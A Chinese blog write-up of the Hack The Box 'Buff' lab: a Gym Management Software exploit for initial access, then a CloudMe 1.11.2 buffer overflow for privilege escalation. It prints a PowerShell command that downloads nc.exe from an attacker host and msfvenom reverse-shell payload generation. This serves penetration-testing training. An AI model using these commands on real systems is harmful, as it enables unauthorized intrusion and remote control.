HTB-Buff

已于 2022-09-06 09:41:41 修改
阅读量281 收藏
点赞数
分类专栏: HTB 文章标签: 其他
于 2022-09-05 23:54:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/126688353
版权

在这里插入图片描述

HTB-Buff

信息收集

nmap
在这里插入图片描述

目录扫描

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
测试了邮件登录是否存在sql注入,是否存在XSS,再查看了源码还有一些可以查看的页面后,收获如下。

  • © Projectworlds.in
  • Gym Management Software 1.0

© Projectworlds.in 应该是一个,额,顾名思义项目世界用来提供项目服务的。

在这里插入图片描述

Gym Management Software 1.0 健身房管理软件,进一步搜索能找到更多信息。

在这里插入图片描述
能找到Gym Management System 1.0

在这里插入图片描述
exploit-db上能找到一些利用。

在这里插入图片描述

前三个需要在/gym/的目录里面某文件上操作,因为我们没有收集到有关这个/gym/目录的信息,只能暂时放弃。
在这里插入图片描述
把第四个下载下来看看。

在这里插入图片描述

开机

使用第四个能获得一个不怎么方便的shell。
在这里插入图片描述

在这里插入图片描述

要么上传个nc.exe来反弹更方便,要么先收集信息然后一步到位到root。

powershell "(new-object System.Net.WebClient).Downloadfile('http://ip:port/nc.exe', 'nc.exe')"

在这里插入图片描述

提权

先收集信息,不着急反弹。

在这里插入图片描述
这本地两个端口运行的什么呢?
在这里插入图片描述
127.0.0.1:3306
在这里插入图片描述

127.0.0.1:8888
在这里插入图片描述
一个一个排除并测试也可以,不过可以考虑再找找有没有什么有用的信息。
在这里插入图片描述

因为这个shell有点不方便,反弹后继续收集信息。
在这里插入图片描述
这个CloudMe_1112.exe的_1112是不是版本1.11.2。
在这里插入图片描述

在这里插入图片描述

选了个最短的试试。
在这里插入图片描述
忽然瞟见一句话。
在这里插入图片描述
以及一个venom,需要我们自己更改。
在这里插入图片描述

先用chisel把端口转过来。
在这里插入图片描述

照着它的修改或者删减一部分。

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4321 -b '\x00\x0A\x0D' -f python

但是他生成的负载变量名有些问题。
在这里插入图片描述
在后面加上-v。

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4321 -b '\x00\x0A\x0D' -f python -v payload

在这里插入图片描述
或者在代码里面改。
在这里插入图片描述

然后执行脚本。
在这里插入图片描述

该账号已被注消
关注
专栏目录
分类流控qdisc之htb
九天小哥的专栏
11-06 1902
文章目录tc参数配置示例算法思想用户态实现数据结构htb全局配置参数: tc_htb_globhtb类配置参数: tc_htb_optqdisc配置参数解析: htb_parse_opt()class配置参数解析: htb_parse_copt()内核实现数据结构qdisc操作集私有数据: htb_schedhtb类结构: htb_classqdisc操作集: htb_qdisc_ops初始化: htb_init()qdisc类操作集: htb_class_opschange()回调: htb_change
HTB-oscplike-Buff+Servmon
m0_53302733的博客
04-18 2047
HTB-oscplike-Buff+Servmon 终于把论文初版写好了 恁妈这老师死命催 交了又拖着不给我改 那催勾八呢 好几天没打了 这两天先康复训练一下 Buff easy难度的buff 靶机IP 10.10.10.198 sudo nmap -sV -sC -A -p- --min-rate=1000 -Pn 10.10.10.198 7680/tcp open pando-pub? 8080/tcp open http Apache httpd 2.4.43 ((Win64) Op
HTB相关TC命令以及内核实现介绍
~~ LINUX ~~
04-17 3710
HTB相关TC命令以及内核实现介绍                                           HTB相关TC命令以及内核实现介绍   前言... 3 关于此文档... 3 参考资料... 3 第一章       HTB 介绍... 4 1.0 HTB 命令介绍... 5 2.0 Rate ceiling
HTB-Brainfuck
TA不懒,但还没有添加简介
05-04 849
HTB-Brainfuck
HTB-reverse
最新发布
m0_73373164的博客
03-09 381
这个的话主要看前面那个代码然后本地分析,需要注意的是这个要在linux运行才能对。ida打开后能看到HTB{%S%S}标识,直接找到带入即可。
【Hack The Box】windows练习-- Buff
人间体佐菲的博客
11-05 614
【Hack The Box】windows练习-- Buff
linux网络流控-htb算法简析
~~ LINUX ~~
04-18 3878
项目中用tc,htb做流控期间,研究了htb(分层令牌桶)算法的实现.觉得这种思想在类似与有消费优先级的生产者消费者场景中也很适用.该算法过于复杂,碍于嘴拙遂在标题中加了简析,只介绍核心思想和关键代码的实现.一个栗子: tc qdisc add dev eth0 root handle 1: htb tc class add dev eth0 parent 1: classid 1:1 h...
linux htb 源码学习-----------一篇我2012年写的Linux流控的文章给大家分享,本人已经不做这一行了
qingsong1001的专栏
09-30 1106
Linux 流量控制源码学习 队列的数据结构图 网络设备的结构体 红色粗体斜体,是流控相关的部分。 struct net_device { /*  * This is the first field of the "visible" part of this structure  * (i.e. as seen by users in the "Space.c" file).  I...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
htb-beep
m0_55772907的博客
09-15 963
一般
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 6222
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 4561
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
m0_48179608的博客
03-02 7852
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.csdn.net/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目录**,看看能不能访问以及不同系统版本的区别。
Silane-PEG-NHS,SIL-PEG-NHS,可以用来修饰蛋白质、多肽以及其他活性基团,NHS-PEG-Silane
qq_39152602的博客
03-03 4136
英文名称:Silane-PEG-NHS 中文名称:硅烷-聚乙二醇-活性酯 分子量:1k,2k,3.4k,5k,10k,20k(可按需定制) 质量控制:95%+ 存储条件:-20°C,避光,避湿 用 途:仅供科研实验使用,不用于诊治 外观: 固体或粘性液体,取决于分子量 注意事项:取用一定要干燥,避免频繁的溶解和冻干 溶解性:溶于大部分有机溶剂,如:DCM、DMF、DMSO、THF等等。在水中有很好的溶解性 取用:现配现用,将包装从冰箱中取出,置于干燥器中缓慢升至室温,打开瓶盖,取用。取用.
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
皮埃尔的博客
03-03 3376
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值